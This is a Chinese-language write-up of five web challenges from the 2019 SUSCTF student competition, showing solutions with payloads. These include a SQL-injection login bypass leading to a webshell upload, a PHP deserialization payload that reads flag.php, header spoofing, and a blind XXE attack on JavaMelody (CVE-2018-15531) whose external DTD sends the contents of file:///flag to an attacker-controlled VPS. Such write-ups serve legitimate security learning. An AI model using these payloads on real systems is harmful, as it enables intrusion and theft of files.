SUSCTF 2nd Web Write Up

文章首发于安恒网络空间安全讲武堂

“东南大学永信杯”江苏大学生网络安全精英邀请赛 2019/4/13 9:00-17:00

Web1 judge 100pt

just do it!

http://211.65.197.117:15000

Payload:

import re
import time
import requests

url = 'http://211.65.197.117:15000/'
r = requests.session()
for i in range(20):
    text = r.get(url).text
    calc = str(re.findall("\n<div>(.*?)=", text))[2:-2].replace(' ', '')
    res = str(re.findall("=(.*?)</div>", text))[2:-2]
    res = int(res)
    ans = eval(calc)
    if ans == res:
        data = {'answer': "true"}
    elif ans != res:
        data = {'answer': "false"}
    time.sleep(1)
    last = r.post(url, data)
    print(last.text)
    '''SUSCTF{python_1s_th3_be3t_l4ngu4ge}'''

Web2 phpStorm 100pt

好的编辑器开发真的很快!!http://sus.njnet6.edu.cn:11002

phpStorm猜测.idea文件泄露,下载workspace.xml分析文件路径,访问Thi5_tru3_qu3sti0n.php(依照引导使用BurpSuite`抓包修改Head头X-Forward-For为127.0.0.1、User-Agent为SUS进行绕过)获取到php代码如下:

<?php
/**
 * Created by PhpStorm.
 * User: y4ngyy
 * Date: 19-3-19
 * Time: 下午2:40
 */
class foo {
    public $filename;
    function printContent() {
        $content = file_get_contents($this->filename);
        echo $content;
    }
}
if ($_SERVER['HTTP_X_FORWARDED_FOR'] != '127.0.0.1') {
    echo 'Only Localhost can see';
    die();
} else if ($_SERVER['HTTP_USER_AGENT'] != 'SUS') {
    echo 'Browser is not SUS<br>';
    echo 'Please use SUS browser!';
    die();
}
show_source(__FILE__);


$a = null;
if (isset($_POST['foo'])) {
    $a = unserialize($_POST['foo']);
    if (!is_object($a)||get_class($a) != 'foo') {
        $a = new foo();
        $a->filename = "text.txt";
    }

} else {
    $a = new foo();
    $a->filename = "text.txt";
}
$a->printContent();
Hello, CTFer!
?>

简单的PHP反序列化,Payload:

<?php
class foo {
    public $filename;
    function printContent() {
        $content = file_get_contents($this->filename);
        echo $content;
    }
}

$a = new foo();
$a->filename = "flag.php";
echo serialize($a);

//O:3:"foo":1:{s:8:"filename";s:8:"flag.php";}
//escape()->O%3A3%3A%22foo%22%3A1%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3B%7D

提交foo后查看网页源代码,发现如下内容:

//view-source:http://sus.njnet6.edu.cn:11002/Thi5_tru3_qu3sti0n.php
<?php
/**
 * Created by PhpStorm.
 * User: y4ngyy
 * Date: 19-3-19
 * Time: 下午2:38
 */
//SUSCTF{PHPSTORM_1s_pR3tty_useFul};?>

Web3 infoGate 300pt

信息门户??http://sus.njnet6.edu.cn:11001

username=admin' or '1'='1&password=1即可以admin的身份登录,进入edit.php写入shell~

访问/Uploads/webshell.php得到:SUSCTf{infoGate_Pr3tty_easy_T0_GETSHELL}.

Web4 Melody 300pt

所以这题为什么叫这个名字?http://211.65.197.117:23333

JavaMelody是一个用来对Java应用进行监控的组件。通过该组件,用户可以对内存、CPU、用户session甚至SQL请求等进行监控,并且该组件提供了一个可视化界面给用户使用。

访问/monitoring可以验证是否加载成功插件:

系 javaMelody XXE(CVE-2018-15531) ,参见复现分析JavaMelody 组件 XXE 漏洞解析. Payload:

//http://211.65.197.117:23333/
POST / HTTP/1.1
Host: 211.65.197.117:23333
Content-type: text/xml
SOAPAction: aaaaa
Content-Length: 154

<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://your_vps_adress:port/ev.dtd">
%remote;
]>
</root>

这里直接响应是没有回显的,为了完成盲打(Blind XXE)读取文件的功能,服务器部署文件ev.dtd

//ev.dtd
<!ENTITY % payload SYSTEM	"file:///flag">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://your_vps_adress:port/%payload;'>">
%int;
%trick;

捕获记录:

211.65.197.117 - - [13/Apr/2019:15:53:02 +0800] "GET /SUSCTF{M3l0dy_CV3_XX3} HTTP/1.1" 404 162 "-" "Java/1.8.0_201"

Web5 重定向之旅 300pt

使用谷歌内核浏览器食用效果更佳。 http://sus.njnet6.edu.cn:65533

  • Part1 查看源代码获取注释代码

//url:http://sus.njnet6.edu.cn:65533/index-ein.html
//hint:源代码的秘密
<meta http-equiv="refresh" content="6;url=index-dos.php">
<!--<?php $part1="3oI";?>-->
  • Part2 在HTTP请求报文头里捕获

网页很快重定向跳转,这里我们可以用BurpSuite抓包查看响应包内容。

//http://sus.njnet6.edu.cn:65533/index-dos.php
//hint: HEAD 你摸得到头脑吗?
$part2: rEdirEct
  • Part3 解AAencode JS加密

//http://sus.njnet6.edu.cn:65533/index-trois.aspx
//http://sus.njnet6.edu.cn:65533/index-ne.js
//JS AAencode 解密如下
leave=function ()
{console.log("$part3:4fun");
location.href='flag.php';
location.href='no_flag.html';}
  • 访问flag.php
//http://sus.njnet6.edu.cn:65533/flag.php
SUSCTF{__}
<?php
error_reporting(0);
echo "SUSCTF{".$part1."_".$part2."_".$part3."}";
echo "<br>";
show_source(__FILE__);
?>

拼接flag得到SUSCTF{3oI_rEdirEct_4fun}.